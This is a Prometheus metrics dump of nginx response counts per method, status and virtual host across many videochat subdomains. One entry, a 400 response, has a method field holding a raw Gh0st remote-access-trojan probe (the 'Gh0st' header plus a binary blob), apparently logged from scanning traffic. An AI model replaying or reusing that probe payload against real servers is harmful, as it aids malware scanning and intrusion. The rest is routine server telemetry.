nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.cafe"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.tv.br"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.cafe"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.date"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.cafe"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.date"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.date"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.cafe"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.date"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.cafe"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.date"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.cafe"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.date"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.cafe"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.date"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.tv.br"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.cafe"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.date"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.cafe"} 165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.date"} 106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.cafe"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.tv.br"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.cafe"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.date"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.tv.br"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.cafe"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.date"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.cafe"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.date"} 153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.cafe"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.date"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.tv.br"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.cafe"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.date"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.tv.br"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.cafe"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.date"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.cafe"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.date"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.cafe"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.date"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.cafe"} 181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.tv.br"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.cafe"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.date"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.cafe"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.date"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.tv.br"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.cafe"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.date"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.tv.br"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.cafe"} 364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.date"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.mx"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.tv.br"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.cafe"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.date"} 124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="Get",status="400",vhost="-"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="Gh0st\\xAD\\x00\\x00\\x00\\xE0\\x00\\x00\\x00x\\x9CKS``\\x98\\xC3\\xC0\\xC0\\xC0\\x06\\xC4\\x8C@\\xBCQ\\x96\\x81\\x81\\x09H\\x07\\xA7\\x16\\x95e&\\xA7*\\x04$&g+\\x182\\x94\\xF6\\xB000\\xAC\\xA8rc\\x00\\x01\\x11\\xA0\\x82\\x1F\\x5C`&\\x83\\xC7K7\\x86\\x19\\xE5n\\x0C9\\x95n\\x0C;\\x84\\x0F3\\xAC\\xE8sch\\xA8^\\xCF4'J\\x97\\xA9\\x82\\xE30\\xC3\\x91h]&\\x90\\xF8\\xCE\\x97S\\xCBA4L?2=\\xE1\\xC4\\x92\\x86\\x0B@\\xF5`\\x0CT\\x1F\\xAE\\xAF]",status="400",vhost="-"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.mx"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.date"} 7 